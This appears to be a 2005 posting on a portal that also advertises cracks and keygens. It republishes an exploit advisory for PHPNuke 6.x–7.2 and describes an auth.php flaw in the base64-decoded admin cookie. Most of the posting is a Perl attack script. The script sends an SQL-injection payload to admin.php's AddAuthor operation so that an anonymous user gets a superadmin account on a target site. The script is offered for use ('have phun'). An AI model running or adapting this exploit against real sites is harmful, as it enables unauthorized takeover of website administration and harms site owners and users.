Welcome to ALLSeek.iNFO - Security related portal. Search crack, serial number, keygen, patch, activation unlock code

Press CTRL-D to bookmark us

Welcome Guest

Main Menu

Network

Sponsor

Top 10 Sites

Partners

Top Submit news Subscribe

Previous article Back to news list Next article

Sponsored links

Want to become one of our authors and see your work published on ALLSeek.iNFO ?

PHPNuke Admin Level Bypass Exploit

Categorie: Vulnerability
Posted: 2005-04-08 by basher13
Views: 701

Current Rating: Not rated

Details

Update:
1:44 AM 4/8/2005

Subject:
" PHPNuke Admin Level Bypass Exploit "

Vulnerable version:
phpnuke 6.x-7.2

Description:
Php-Nuke is popular freeware content management system, written in php by
Francisco Burzi. This CMS (Content Management System) is used on many thousands
websites, because it`s free of charge, easy to install and has broad set of features.

Vulnerability:
User anonymous may create superadmin account without any authentication at all.
See original code in auth.php line 48:

$admintest = 0;

if(isset($admin) && $admin != "") {
$admin = base64_decode($admin);
$admin = explode(":", $admin);
$aid = "$admin[0]";
$pwd = "$admin[1]";

Base64decoded variable "admin" from cookie will be exploded to
components - admin id and password's md5 hash. As alway with base64 encode/decode
operation, care must by taken with special symbols, like single quotes. Before using
the base64decoded information, addslashes() function must be used.

Exploit:
#!/usr/bin/perl
# PHPNuke Admin Level Bypass Exploit
# -----------------------------------
#
# Greats: Janek Vind "waraxe" (has discovered bug)
# Info: 98.to/infamous

use IO::Socket;

if (@ARGV < 4)
{

system "clear";

print "\nPHPNuke Admin Level Bypass Exploit\n\n";
print "------------------------------------------\n";
print "\n INFGP - Hacking&Security Research\n;
print "\n\n";
print "[-]Usage: phpnkb.pl [target_host] [path] [user] [pass] \n";
print "[!]Exam: phpnkb.pl www.target.com phpnuke jhondoe bego \n\n";
exit(1);
}

system "clear";

$server = $ARGV[0];
$folder = $ARGV[1];
$user = $ARGV[2];
$pass = $ARGV[3];

print "\n[+]Connecting to IP ...\n";
print $server;

$socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$server",
PeerPort => "80"); unless ($socket)
{
die "[-]$server connection FAILED\n"
}

print "[+]Connected\n\n";
print "[+]Send evil request..\n";

$string="eCcgVU5JT04gU0VMRUNUIDEvKjox";
$0day="admin.php?op=AddAuthor&add_aid=$user&add_name=God&add_pwd=$pass&add_email
=foo@bar.com&add_radminsuper=1&admin=$string";

print "[+]Sent 0day..\n\n";

print $socket "GET /$ARGV[1]/$0day";

print "[+]Attack successful!\n";
print "[>]User:$user\n";
print "[>]Pass:$pass\n;
print "[*]Has access Admin Level,have phun..\n";

close($socket);

Solution:
Upgrade for the next version.

Vendor URL:
http://phpnuke.org

Syndication

Permalink Email this

The URI to TrackBack this entry is:
http://allseek.info/news/trackback.php?id=1459

User comments (post your comments here)

Only registerd members can post comments and articles

Previous article Back to news list Next article

InterJOB.su

LAST QUERIES